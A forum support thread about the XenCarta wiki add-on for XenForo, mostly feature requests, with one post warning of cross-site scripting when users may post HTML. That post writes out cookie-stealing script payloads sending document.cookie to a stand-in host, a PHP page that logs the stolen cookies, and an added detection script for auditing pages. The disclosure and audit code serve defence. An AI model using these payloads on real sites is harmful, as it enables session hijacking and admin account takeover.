
[8wayRun.Com] XenCarta (Lite Wiki)

Status
Not open for further replies.
Maybe add the possibility to remove link from menu? Idk if it's been mentioned or not yet. Not scanning through 31 pages to find out :( We need a search thread option...
 
Are there any plans to build a citation system into this? Something that will automatically reference to the footer reference? ie. this text is some complicated-word [1] that without a citation referenced, would otherwise be made-up!

References
[1] - Merriam-Webster's collegiate dictionary (10th ed.). (1993). Springfield, MA: Merriam-Webster.
Anthony,
Did you ever have this work out? Citation would make all the links neatly sit at the footer.
 
The TOC behavior is very weird, and I haven't been able to find out how to change it.

Right now: it inserts the TOC right before the first header, which means if the header is inside a table, the TOC will be inside that table.

What I would like: the TOC is always inserted at the top, above all content on the wiki page, and is wrapped in its own div, so it can be separately styled.

I haven't been able to find any template containing the TOC styling options, so I'm guessing it's hardcoded?
 
I just created my own Andy, manually, being a numbered list of references at the bottom, then inserting a [1] and so forth within the text. I did play with a template to do it, performing super-script, but didn't like it.
 
I just created my own Andy, manually, being a numbered list of references at the bottom, then inserting a [1] and so forth within the text. I did play with a template to do it, performing super-script, but didn't like it.
Any sample to look at, Anthony?
I was thinking of that manual way to fall back as well but if I allow several people to edit the wiki, it will be a mess real quick since nobody takes care of making sure the reference is updated correctly.
 
I'd really like to know where to find the code as well if it's not hardcoded. We want to add a single image to the right of the TOC on each page.
 
What is the purpose and use of the gallery template that is included? Anyone has sample/code of how it is used?
Thanks
 
Got it sorted. I read through the AZcloud pages, added the controller but it didn't show up. After reading your post, I went back and checked my page_container template and true to form, the piece of code was removed. Happened too many times already :(
 
Looked good, but I found a nasty security issue with this wiki when allowing html in the wiki

<< Please pay attention to this. Anyone that has installed this wiki plug-in and allows users to add their own HTML will be open to this security issue

I started to use this myself until I realised script was live

The user / wiki writer only needs to insert script to capture the session cookie, example:

1st example
<a href = "javascript: location.href='http://www.example.com/cap.php?cookie='+document.cookie;">dont click this</a>

2nd example (just embed script .. you could do this with a hidden iframe, and the user wouldn't even know)
<script>location.href='http://www.example.com/cap.php?cookie='+ document.cookie;</script>

For demonstration, you can see the cookie on your own wiki by directly adding the following html to a wiki page (and then refreshing the page):

demonstration example
<script>alert(document.cookie)</script>

The first example allows the attacker to take the cookie of any visitor that visits a page that contains the script (including admins).
The attacker sends this cookie to their own page at http://www.example.com/cap.php

A simple cap.php page that will take this cookie:

<?php
$cookie = $_GET['cookie']; // yes, I know it's an unprotected request
$fp = fopen('cookies.txt', 'a');
fwrite($fp, $cookie);
fclose($fp);
?>

This cookie can then be saved locally and used to replace their own cookie

If an admin visits this page, the attacker can log in with the admin session

[I didn't want to offend anyone, I'm just pointing out what I saw]
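
For admins who have had the HTML data type enabled, one way to check existing wiki pages for the constructs shown in this post (an added example, not part of the original post and not XenCarta code). The page export shape (`title`, `dataType`, `body`) and all function names are assumptions, and the rules are an audit heuristic, not a sanitizer.

```javascript
// Added example (not XenCarta code): audit heuristic for stored wiki pages.
// It flags markup that can run script in a visitor's browser; it is NOT a sanitizer.
const RULES = [
  { id: 'script-element', re: /<\s*script\b/i },
  { id: 'javascript-url', re: /\b(?:href|src|action|formaction)\s*=\s*["']?\s*javascript\s*:/i },
  { id: 'event-handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { id: 'frame-or-embed', re: /<\s*(?:iframe|object|embed)\b/i },
];

// Decode numeric character references so an encoded scheme is still matched.
const fromCode = (n) => (n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '');
function normalise(html) {
  return html
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCode(parseInt(d, 10)));
}

// Returns the ids of every rule that matches one page body.
function findActiveContent(html) {
  const text = normalise(String(html));
  return RULES.filter((r) => r.re.test(text)).map((r) => r.id);
}

// pages: [{ title, dataType, body }] is a hypothetical export shape.
function auditPages(pages) {
  return pages
    .map((p) => ({ title: p.title, dataType: p.dataType, findings: findActiveContent(p.body) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample pages using the shapes quoted in the post above.
const SAMPLE_PAGES = [
  { title: 'Rules', dataType: 'html',
    body: '<table><tr><td><h2>Intro</h2><a href="http://www.example.com/">home</a></td></tr></table>' },
  { title: 'Guide', dataType: 'html',
    body: '<a href = "javascript: location.href=\'http://www.example.com/cap.php?cookie=\'+document.cookie;">link</a>' },
  { title: 'FAQ', dataType: 'html',
    body: '<p>Hello</p><script>alert(document.cookie)</script>' },
  { title: 'News', dataType: 'bbcode', body: '[b]Welcome[/b] to the [url=http://www.example.com/]wiki[/url]' },
];

for (const r of auditPages(SAMPLE_PAGES)) {
  console.log(`${r.title} (${r.dataType}): ${r.findings.join(', ')}`);
}
```

Any page this reports should be reviewed by hand and, if it was written by an untrusted user, converted to the BB Code data type.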
 
Aren't there really 100s of security threats when you allow someone to use HTML ?
Isn't that why you don't allow people to embed HTML ?
Besides stealing cookies, wouldn't there be even nastier exploits ?

When you are allowing people to embed HTML, I think the only security that will ever protect you is
(1) don't allow HTML in the wiki
(2) if you allow HTML in the wiki, you'd better be damn sure the person is on your side.

Q: what are the default "HTML in the wiki" settings ? Default = No ?
 
Yes there are many, taking the admin session is easy to demonstrate (admin accounts can then be used to do more damage, etc)

I don't know what the default option is, I just set it up (I don't remember turning HTML on, but I may be mistaken). I'm still figuring out where all the options are for this, so I don't think I would have changed it (still new to xenforo)

On creating a Wiki page, there were two options
Data type = BB Code
and
Data type = HTML

Flicking these data types looks like it's available to anyone with edit /create permissions

I don't remember turning anything related to HTML on... maybe I did. I just gave it a quick try out (looked good). But it really should be pointed out that the allow HTML should never be used for public (or any other use other than yours - the admin)

.. I'm still new to the plug-in, so maybe it's never intended to be used with the html option

Where do I turn this html Data Type option off/On? I want users to be able to create their own wiki pages / update others, but the HTML data-type is a no-no
 
I've just registered with a few sites and noticed that lots of forums allow users to edit the HTML content

This is not safe
- don't allow users to add their own html
- never allow user to add their own script
- never trust user content.

I'm not sure what else I can do to warn people. This is not a secure plug-in and can lead to someone logging in with your admin account and doing what they want

see: http://xenforo.com/community/threads/8wayrun-com-xencarta-lite-wiki.7589/page-31#post-242498
 
This is not a secure plug-in and can lead to someone logging in with your admin account and doing what they want

see: http://xenforo.com/community/threads/8wayrun-com-xencarta-lite-wiki.7589/page-31#post-242498
This is a secure plugin, but the moment you allow any user to parse HTML content, that is the moment "YOU" open up your forum to being hijacked.

There is a HTML mod available here, which again, allows "YOU" to assign HTML rights to usergroups. IF you assign such rights to untrusted people, then "YOU" are an idiot as an admin.
 